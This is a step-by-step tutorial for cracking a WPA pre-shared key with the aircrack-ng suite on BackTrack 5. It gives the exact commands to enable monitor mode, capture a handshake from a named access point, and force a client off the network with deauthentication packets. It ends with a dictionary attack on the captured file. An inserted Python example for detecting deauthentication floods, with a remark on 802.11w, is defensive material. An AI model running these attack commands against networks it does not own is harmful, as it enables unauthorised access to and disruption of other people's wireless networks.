Wireless Hacking - WPA Key Crack
0x00. Environment Setup
OS : BackTrack 5 R3 (32-bit)
Kernel : Linux bt 3.2.6
0x01. iwconfig
Configure a wireless network interface.
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.
# iwconfig
0x02. airmon-ng
airmon-ng is a script that can be used to enable monitor mode on wireless interfaces.
airmon-ng <start|stop> <interface>
# airmon-ng start wlan0
0x03. airodump-ng
A wireless packet capture tool for aircrack-ng.
airodump-ng [options] <interface>
# airodump-ng mon0
To capture a specific wireless network:
[Options]
-c <channel>[,<channel>[, ...]]
--channel <channel>[,<channel>[, ...]]
: Indicate the channel(s) to listen to. By default airodump-ng hops on 2.4 GHz channels.
-w <prefix>
--write <prefix>
: The dump file prefix to use. If this option is not given, data is only shown on the screen. Besides this file, a CSV file with the same filename as the capture will be created.
[Filter options]
-d <bssid>
--bssid <bssid>
: Only show networks matching the given BSSID.
# airodump-ng -c 9 -d 64:e5:99:0f:38:e2 -w WPA-Key mon0
WPA handshake collection
0x04. aireplay-ng
Inject packets into a wireless network to generate traffic.
aireplay-ng <options> <replay interface>
[Attack modes]
-0 <count>
--deauth=<count>
: This attack sends deauthentication packets to one or more clients which are currently associated with a particular access point.
[Replay options]
-a <bssid>
: Set Access Point MAC address.
-c <dmac>
: Set destination MAC address.
# aireplay-ng -0 10 -a 64:e5:99:0f:38:e2 -c f4:f1:5a:e8:f6:4c mon0
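Seen from the monitoring side, the deauthentication frames described above are easy to spot. The following is an added example (not part of the original post) that parses bare 802.11 management frames and flags any BSSID/station pair that receives a burst of deauths. The sample frames, MAC addresses, threshold and window are constructed assumptions.

```python
import struct
from collections import defaultdict

DEAUTH_FC0 = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12 (deauth)

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Return (dest, src, bssid, reason) for a deauth frame, else None.
    Expects a bare 802.11 frame: no radiotap header, no FCS."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    dest, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    # With the Protected Frame bit set (802.11w) the body is encrypted: no readable reason.
    reason = None if frame[1] & 0x40 else struct.unpack_from("<H", frame, 24)[0]
    return mac(dest), mac(src), mac(bssid), reason

def detect_floods(captures, threshold=5, window=1.0):
    """captures: (timestamp_seconds, frame_bytes) tuples in time order.
    Returns sorted (bssid, station) pairs with >= threshold deauths inside `window` seconds."""
    recent, flagged = defaultdict(list), set()
    for ts, frame in captures:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dest, src, bssid, _reason = parsed
        station = dest if src == bssid else src  # the non-AP side of the pair
        times = recent[(bssid, station)]
        times.append(ts)
        while ts - times[0] > window:  # drop timestamps that fell out of the window
            times.pop(0)
        if len(times) >= threshold:
            flagged.add((bssid, station))
    return sorted(flagged)

# Constructed sample data (locally administered MACs, not captured traffic).
AP, STA, STA2 = "020000000001", "020000000002", "020000000003"
DEAUTH = bytes.fromhex("c0003a01" + STA + AP + AP + "0000" + "0700")  # AP -> STA, reason 7
LEAVE = bytes.fromhex("c0003a01" + AP + STA2 + AP + "0000" + "0300")  # STA2 leaving, reason 3
BEACON = bytes.fromhex("80000000" + "ffffffffffff" + AP + AP + "0000" + "00" * 12)
SAMPLE = [(0.0, BEACON)] + [(1.0 + 0.01 * i, DEAUTH) for i in range(10)] + [(5.0, LEAVE), (30.0, DEAUTH)]

if __name__ == "__main__":
    for bssid, station in detect_floods(SAMPLE):
        print(f"deauth burst: bssid={bssid} station={station}")
```

When 802.11w (Protected Management Frames) is negotiated, stations discard unauthenticated deauthentication frames, which removes the need to rely on detection alone.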
0x05. aircrack-ng
An 802.11 WEP / WPA-PSK Key Cracker.
aircrack-ng [options] <.cap / .ivs file(s)>
# aircrack-ng -w Dict.txt WPA-Key-01.cap